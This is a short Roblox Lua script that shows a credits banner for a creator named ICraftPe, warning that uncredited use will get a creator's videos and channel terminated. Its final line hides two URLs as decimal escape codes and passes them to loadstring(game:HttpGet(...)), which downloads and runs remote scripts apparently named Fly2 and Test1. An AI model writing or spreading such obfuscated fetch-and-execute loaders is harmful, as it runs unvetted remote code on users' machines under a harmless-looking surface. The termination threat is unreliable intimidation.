local CreditsGUI = Instance.new("ScreenGui")
CreditsGUI.Name = "CreditsGUI"
CreditsGUI.Parent = game.Players.LocalPlayer.PlayerGui

local CreditsLabel = Instance.new("TextLabel")
CreditsLabel.TextScaled = true
CreditsLabel.Text = "Creator: ICraftPe (YouTube: @ICraftPe). Using my scripts without putting @ICraftPe in the description or comments will be a result of terminating your videos and channel."
CreditsLabel.Position = UDim2.new(0.386, 0 ,0.091, 0)
CreditsLabel.Archivable = true
CreditsLabel.Size = UDim2.new(0, 300, 0, 50)
CreditsLabel.Parent = CreditsGUI

local UICorner = Instance.new("UICorner")
UICorner.Parent = CreditsLabel
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\73\67\114\97\102\116\80\101\47\73\67\114\97\102\116\80\101\47\109\97\105\110\47\70\108\121\50"))() loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\73\67\114\97\102\116\80\101\47\73\67\114\97\102\116\80\101\47\109\97\105\110\47\84\101\115\116\49"))()
